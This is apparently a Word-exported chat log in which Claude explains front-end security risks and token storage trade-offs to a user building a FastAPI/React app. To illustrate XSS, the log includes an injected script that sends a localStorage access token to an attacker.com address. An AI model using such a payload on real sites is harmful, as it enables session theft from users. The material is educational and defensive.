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68CB" w:rsidRPr="008D68CB" w:rsidRDefault="008D68CB" w:rsidP="008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68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Excellent question to ask before building more features. Let's go through this properly — this is real security thinking, exactly what a professional considers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D68CB" w:rsidRPr="008D68CB" w:rsidRDefault="008D68CB" w:rsidP="008D68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68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68CB" w:rsidRPr="008D68CB" w:rsidRDefault="008D68CB" w:rsidP="008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D68C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The Core Truth First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Your React frontend code is NOT secret.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The moment someone visits your website,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their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browser DOWNLOADS your entire React code.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They can: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Right-click → "View Page Source"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Open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DevTools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→ see every line of your JavaScript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See your API calls, your component logic, everything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This is true for EVERY website ever built.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Instagram, Amazon, your bank — all frontend code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is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visible to anyone who visits.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This is WHY your .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env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, SECRET_KEY, database password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live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ONLY on the backend (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FastAPI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) — never in React.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The backend code is NEVER sent to the browser.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D68CB" w:rsidRPr="008D68CB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Only the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backend's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RESPONSES are sent.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D68CB" w:rsidRPr="008D68CB" w:rsidRDefault="008D68CB" w:rsidP="008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68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So your instinct is correct — as long as </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE7867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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE7867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env</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D68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stays on the server side only, attackers can't see your secrets through the frontend. But that doesn't mean the frontend is risk-free. Let me walk through real attack types.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D68CB" w:rsidRPr="008D68CB" w:rsidRDefault="008D68CB" w:rsidP="008D68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68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68CB" w:rsidRPr="008D68CB" w:rsidRDefault="008D68CB" w:rsidP="008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D68C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Attack 1 — Reading Your API Calls (Not a real vulnerability, just visibility)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Attacker opens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DevTools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→ Network tab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Watches every request your app makes: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POST /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auth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/login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GET /streaks/me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Authorization: Bearer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eyJhbGci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...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They now KNOW your API structure.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This is not inherently dangerous —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it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just means they know WHAT to attack next.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Real apps (Instagram, Twitter) are exactly this open.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Knowing the API shape isn't the vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D68CB" w:rsidRPr="008D68CB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What matters is whether each endpoint is properly secured.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D68CB" w:rsidRPr="008D68CB" w:rsidRDefault="008D68CB" w:rsidP="008D68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68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68CB" w:rsidRPr="008D68CB" w:rsidRDefault="008D68CB" w:rsidP="008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D68C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Attack 2 — Stealing Tokens From </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008D68C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localStorage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008D68C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(XSS Attack)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D68CB" w:rsidRPr="008D68CB" w:rsidRDefault="008D68CB" w:rsidP="008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68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is the real one to understand deeply.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lastRenderedPageBreak/>
        <w:t>Remember — we store tokens like this in api.js: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localStorage.setItem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(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access_token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", token)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spellStart"/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localStorage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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can be read by ANY JavaScript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running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on your page — including malicious JavaScript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if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an attacker manages to inject some.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How would they inject JavaScript into YOUR site?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Example — imagine later you build a "bio" field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where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users write about themselves, and you display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other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users' bios without cleaning the text first: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Attacker sets their bio to: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&lt;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script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&gt;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fetch(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'https://attacker.com/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steal?token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=' +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localStorage.getItem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('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access_token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'))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&lt;/script&gt;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If your code does this when displaying bios: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&lt;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div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&gt;{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user.bio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}&lt;/div&gt;   ← React actually ESCAPES this automatically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React is GOOD here by default — it automatically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escapes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text content, so &lt;script&gt; tags typed by users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show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up as harmless text, not executable code.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This protection breaks ONLY if you specifically use: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dangerouslySetInnerHTML</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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(React even WARNS you in the name itself)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Rule going forward: NEVER use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dangerouslySetInnerHTML</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="008D68CB" w:rsidRPr="008D68CB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on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any text that came from another user. We simply won't.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D68CB" w:rsidRPr="008D68CB" w:rsidRDefault="008D68CB" w:rsidP="008D68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68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68CB" w:rsidRPr="008D68CB" w:rsidRDefault="008D68CB" w:rsidP="008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D68C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Attack 3 — Someone Steals Your Laptop / Browser Session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If someone has physical access to your unlocked laptop,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they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could open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DevTools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and copy your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access_token</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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from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localStorage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directly.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This is why access tokens expire in 30 minutes —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even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if stolen, the window of damage is small.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Refresh tokens are longer-lived, which is exactly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why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we built the revoke/sessions table system —</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D68CB" w:rsidRPr="008D68CB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you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can kill a stolen session even before it expires.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D68CB" w:rsidRPr="008D68CB" w:rsidRDefault="008D68CB" w:rsidP="008D68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68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D68CB" w:rsidRPr="008D68CB" w:rsidRDefault="008D68CB" w:rsidP="008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D68C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Attack 4 — Brute Forcing Login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Attacker writes a script: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try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email + password "123456"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try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email + password "password1"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try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email + password "qwerty123"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repeat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10,000 times per second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lastRenderedPageBreak/>
        <w:t>This doesn't come through the frontend UI at all —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they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skip your React app entirely and send requests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DIRECTLY to your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FastAPI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backend using a script.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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This is why the FRONTEND being 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secure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or not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doesn't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even matter for this attack — they never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touch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your frontend code.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Defense: rate limiting on the BACKEND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(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we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mentioned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Redis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earlier — this is exactly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what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it's for, we'll build this when we get there)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This proves something important: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Frontend security and backend security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are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two SEPARATE concerns. A perfect frontend</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D68CB" w:rsidRPr="008D68CB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cannot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protect a backend with no rate limiting.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D68CB" w:rsidRPr="008D68CB" w:rsidRDefault="008D68CB" w:rsidP="008D68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68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D68CB" w:rsidRPr="008D68CB" w:rsidRDefault="008D68CB" w:rsidP="008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D68C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Attack 5 — Man-in-the-Middle (Network Level, Not Frontend Code)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If your site runs on http:// instead of https://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someone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on the same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WiFi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network (coffee shop, etc.)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can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literally READ the raw data flying between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your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browser and your server — including tokens.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This has nothing to do with your React code being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</w:t>
      </w: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insecure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 — it's about the CONNECTION itself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not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being encrypted.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Defense: HTTPS (we'll set this up when deploying —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free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and automatic through Railway/Render/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Vercel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During local development (localhost) this isn't</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D68CB" w:rsidRPr="008D68CB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real risk since it never leaves your own computer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D68CB" w:rsidRPr="008D68CB" w:rsidRDefault="008D68CB" w:rsidP="008D68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68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D68CB" w:rsidRPr="008D68CB" w:rsidRDefault="008D68CB" w:rsidP="008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D68C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The Honest Summary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Things attackers CANNOT get from your frontend code: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Your SECRET_KEY              → never sent to browser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Your database password       → never sent to browser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Your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bcrypt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hashing logic    → never sent to browser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Other users' passwords       → never sent to browser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Things attackers COULD theoretically target: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Their OWN stored tokens (their own account only)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Your API endpoints directly (bypassing frontend, scripted)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Network traffic if not using HTTPS in production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XSS if we ever misuse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dangerouslySetInnerHTML</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Your REAL security work lives almost entirely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in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the BACKEND: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r w:rsidRPr="00EE7867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✓</w:t>
      </w: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bcrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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hashing          (done)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r w:rsidRPr="00EE7867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✓</w:t>
      </w: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JWT with expiry          (done)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lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE7867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✓</w:t>
      </w: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Sessions/revoke system   (done)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r w:rsidRPr="00EE7867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✓</w:t>
      </w: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CORS restricting origins (done)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r w:rsidRPr="00EE786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❌</w:t>
      </w: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Rate limiting            (not yet </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE786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—</w:t>
      </w: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Redis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, later)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r w:rsidRPr="00EE786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❌</w:t>
      </w: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HTTPS                    (not yet </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE786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—</w:t>
      </w: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at deployment)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D68CB" w:rsidRPr="008D68CB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</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE786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❌</w:t>
      </w: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Input validation everywhere (ongoing, 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Pydantic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helps)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D68CB" w:rsidRPr="008D68CB" w:rsidRDefault="008D68CB" w:rsidP="008D68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68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D68CB" w:rsidRPr="008D68CB" w:rsidRDefault="008D68CB" w:rsidP="008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D68C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What This Means </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008D68C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For</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008D68C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You Right Now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You are NOT exposed in any serious way at this stage.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Your .</w:t>
      </w:r>
      <w:proofErr w:type="spell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env</w:t>
      </w:r>
      <w:proofErr w:type="spell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staying private is correct and sufficient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for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what's been built so far.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The frontend code being "visible" to attackers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is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normal and expected for EVERY website —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it's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not a flaw, it's just how browsers work.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Your actual security posture is strong because</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D68CB" w:rsidRPr="00EE7867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the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real protections (hashing, JWT, sessions)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D68CB" w:rsidRPr="008D68CB" w:rsidRDefault="008D68CB" w:rsidP="008D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live</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00EE7867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entirely server-side, which we built correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B628D" w:rsidRDefault="004B628D" w:rsidP="004B628D">
      <w:pPr>
        <w:pStyle w:val="whitespace-pre-wrap"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>but</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is it safe to store both? </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>on</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the front-end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B628D" w:rsidRDefault="004B628D" w:rsidP="004B628D">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="text-text-500"/>
        </w:rPr>
        <w:t>1:04 PM</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B628D" w:rsidRDefault="004B628D" w:rsidP="004B628D">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="inline-flex"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B628D" w:rsidRDefault="004B628D" w:rsidP="004B628D">
      <w:r>
        <w:rPr>
          <w:rStyle w:val="transition-all"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="absolute"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B628D" w:rsidRDefault="004B628D" w:rsidP="004B628D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Claude responded: Real, important question.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B628D" w:rsidRDefault="004B628D" w:rsidP="004B628D">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Real, important question.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Let's be honest about the tradeoffs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B628D" w:rsidRDefault="004B628D" w:rsidP="004B628D">
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B628D" w:rsidRPr="004B628D" w:rsidRDefault="004B628D" w:rsidP="004B628D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B628D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>The Short Answer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It's "fine for now, while learning and building"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It's "not the gold-standard production approach"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There's a real gap between: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what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we built (good enough, working, understandable)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what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a banking app or Instagram actually does</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B628D" w:rsidRPr="004B628D" w:rsidRDefault="004B628D" w:rsidP="004B628D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr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(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more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complex, harder to explain while learning)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B628D" w:rsidRPr="004B628D" w:rsidRDefault="004B628D" w:rsidP="004B628D">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B628D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Let me show you exactly why, and what the better approach looks like.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B628D" w:rsidRPr="004B628D" w:rsidRDefault="004B628D" w:rsidP="004B628D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B628D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B628D" w:rsidRPr="004B628D" w:rsidRDefault="004B628D" w:rsidP="004B628D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B628D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The Risk With </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004B628D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>localStorage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004B628D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004B628D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Specifically</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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Anything stored in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localStorage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can be read by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ANY JavaScript that runs on your page.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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We already covered this — React escapes user content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by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default, so as long as we never use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dangerouslySetInnerHTML</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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on untrusted text, you're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reasonably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protected from a stranger's injected script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stealing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your tokens.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BUT — the risk isn't just "a hacker on the internet."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It's also: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any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third-party script you add later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(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an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ad script, an analytics script, a poorly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vetted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npm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package)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ALL of these can read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localStorage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too,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B628D" w:rsidRPr="004B628D" w:rsidRDefault="004B628D" w:rsidP="004B628D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr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because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they all run as JavaScript on your page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This is the actual concrete risk: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You're building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BibleAI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now, simple, you control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every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script that runs.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Later, you might add Google Analytics, a chat widget,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a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payment processor's SDK — any one of THOSE scripts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could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theoretically read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localStorage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too,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B628D" w:rsidRPr="004B628D" w:rsidRDefault="004B628D" w:rsidP="004B628D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr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if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it were ever compromised or malicious.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B628D" w:rsidRPr="004B628D" w:rsidRDefault="004B628D" w:rsidP="004B628D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B628D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B628D" w:rsidRPr="004B628D" w:rsidRDefault="004B628D" w:rsidP="004B628D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B628D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">The More Secure Approach — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004B628D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>httpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004B628D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cookies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Instead of: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spellStart"/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localStorage.setItem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>(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>"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refresh_token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>", token)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→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readable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by any JavaScript, including malicious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The production-grade approach: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server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sends the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refresh_token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as an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httpOnly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cookie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→ JavaScript CANNOT read it AT ALL, not even our own code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→ only the BROWSER can read it, and only sends it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B628D" w:rsidRPr="004B628D" w:rsidRDefault="004B628D" w:rsidP="004B628D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr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automatically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with requests to our backend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Real comparison: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localStorage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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>: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"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here's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a key, anyone with JavaScript access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on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this page can use it"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httpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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cookie: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"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this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key is sealed in a box only the browser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itself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can open, JavaScript never touches it,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B628D" w:rsidRPr="004B628D" w:rsidRDefault="004B628D" w:rsidP="004B628D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr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not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even ours"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B628D" w:rsidRPr="004B628D" w:rsidRDefault="004B628D" w:rsidP="004B628D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B628D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1036" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B628D" w:rsidRPr="004B628D" w:rsidRDefault="004B628D" w:rsidP="004B628D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B628D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>What Most Real Production Apps Actually Do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access_token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  → kept in memory (a React variable, not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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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localStorage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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>) — disappears on page refresh,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             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which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is fine since it's short-lived anyway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refresh_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token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 →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httpOnly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cookie set BY THE BACKEND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               →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browser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sends it automatically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               → JavaScript never sees it, never touches it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B628D" w:rsidRPr="004B628D" w:rsidRDefault="004B628D" w:rsidP="004B628D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr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               → immune to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localStorage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>-reading attacks entirely</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B628D" w:rsidRPr="004B628D" w:rsidRDefault="004B628D" w:rsidP="004B628D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B628D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1037" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B628D" w:rsidRPr="004B628D" w:rsidRDefault="004B628D" w:rsidP="004B628D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B628D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Why We Didn't Build It This Way </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004B628D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>From</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004B628D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> the Start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httpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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cookies require backend changes too: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FastAPI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has to SET the cookie in its response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(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instead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of just returning JSON with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refresh_token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>)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This adds real complexity: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 Set-Cookie headers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SameSite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and Secure cookie flags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 CORS needs adjusting (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allow_credentials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handling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gets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more particular)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 Local development with cookies across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different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ports (5173 vs 8000) has its own quirks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This is genuinely a step up in complexity,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and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given you're still learning the fundamentals,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I started you on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localStorage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because it's simpler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to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see, debug, and understand — you can literally</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B628D" w:rsidRPr="004B628D" w:rsidRDefault="004B628D" w:rsidP="004B628D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pP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watch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it in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DevTools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>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B628D" w:rsidRPr="004B628D" w:rsidRDefault="004B628D" w:rsidP="004B628D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B628D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1038" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B628D" w:rsidRPr="004B628D" w:rsidRDefault="004B628D" w:rsidP="004B628D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B628D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>My Honest Recommendation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Keep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localStorage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for now WHILE we build out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the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rest of the app's features (streaks, reading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plans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>, quizzes, groups) — this lets you focus on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learning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the FEATURE patterns without juggling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cookie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complexity at the same time.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Once the app's features are solid, we do a dedicated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>"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harden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the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auth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system" pass where we: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switch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refresh_token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to an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httpOnly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cookie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keep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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004B628D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>access_token</w:t>
      </w:r>
      <w:proofErr w:type="spell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in memory only</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B628D" w:rsidRPr="004B628D" w:rsidRDefault="004B628D" w:rsidP="004B628D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this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becomes a focused, well-understood upgrade</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B628D" w:rsidRPr="004B628D" w:rsidRDefault="004B628D" w:rsidP="004B628D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B628D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004B628D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>rather</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="004B628D">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="var(--font-mono)" w:hAnsi="var(--font-mono)"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> than something half-understood from day one</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B628D" w:rsidRPr="004B628D" w:rsidRDefault="004B628D" w:rsidP="004B628D">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B628D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">This is genuinely how real teams operate too — ship working </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004B628D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>auth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004B628D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> first, harden it before public launch. You're not doing anything wrong by sequencing it this way, as long as we DO come back to it before </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004B628D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>BibleAI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004B628D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> has real users' data in it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B628D" w:rsidRPr="004B628D" w:rsidRDefault="004B628D" w:rsidP="004B628D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B628D">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:pict>
          <v:rect id="_x0000_i1039" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B628D" w:rsidRPr="004B628D" w:rsidRDefault="004B628D" w:rsidP="004B628D">
      <w:pPr>
        <w:pStyle w:val="font-claude-response-body"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
